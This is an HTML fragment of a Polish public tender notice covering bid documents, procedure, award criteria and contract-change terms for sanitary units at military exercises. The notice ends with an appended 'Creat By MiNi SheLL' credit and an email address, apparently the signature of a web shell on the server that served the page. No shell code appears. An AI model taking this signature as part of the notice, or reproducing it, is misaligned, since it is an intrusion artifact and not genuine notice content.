                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">
        1. wypełniony i podpisany Formularz ofertowy i cenowy z wykorzystaniem wzorów
              zamieszczonego  w  niniejszej SIWZ  Załącznik nr 1 oraz  nr 1a do SIWZ;
2.	Oświadczenie  o obowiązku podatkowym  (tzw. odwrócony VAT), zawarte w treści Załącznika nr 1 do SIWZ, pkt. 8.
3.	Oświadczenie o przynależności do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. z 2015r., poz. 184, 1618 i 1634.  Załącznik nr 6 do SIWZ.


W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, o których mowa w pkt 7.1. niniejszej SIWZ składa każdy z Wykonawców. Oświadczenia te mają potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.

7.3. Wykonawca który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w pkt. 7.1. SIWZ/ składa oświadczenie, o którym mowa w pkt. 7.1. niniejszej SIWZ.

7.4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku podstaw do wykluczenia oraz spełniania  w zakresie, w jakim powołuje się na ich zasoby  - warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 7.1. SIWZ/ składa także oświadczenie, o którym mowa w pkt. 7.1. SIWZ dotyczące tych podmiotów.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br />
                  z kilkoma wykonawcami
                <br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> :
              
              
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br /><b>Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: </b><br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>dyspozycyjność Wykonawcy</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />8)	Przewidywane przez Zamawiającego zmiany umowy określone w paragrafie 15 ust. 2 umowy to: 
1/ zmiana zleconej do usługi ilości urządzeń sanitarnych tj. ich zmniejszenie lub zwiększenie w obrębie danej lokalizacji; 
2/ zmiana dopuszczająca do realizacji części zamówienia podwykonawcy, w sytuacji nieprzewidzianej, po wcześniejszym uzgodnieniu z Zamawiającym; 
      3/ zmiana wysokości stawki  podatku VAT;
4/zmiana terminu wykonania umowy związana ze zmianą terminów ćwiczeń poligonowych.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 25/08/2016, godzina: 07:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com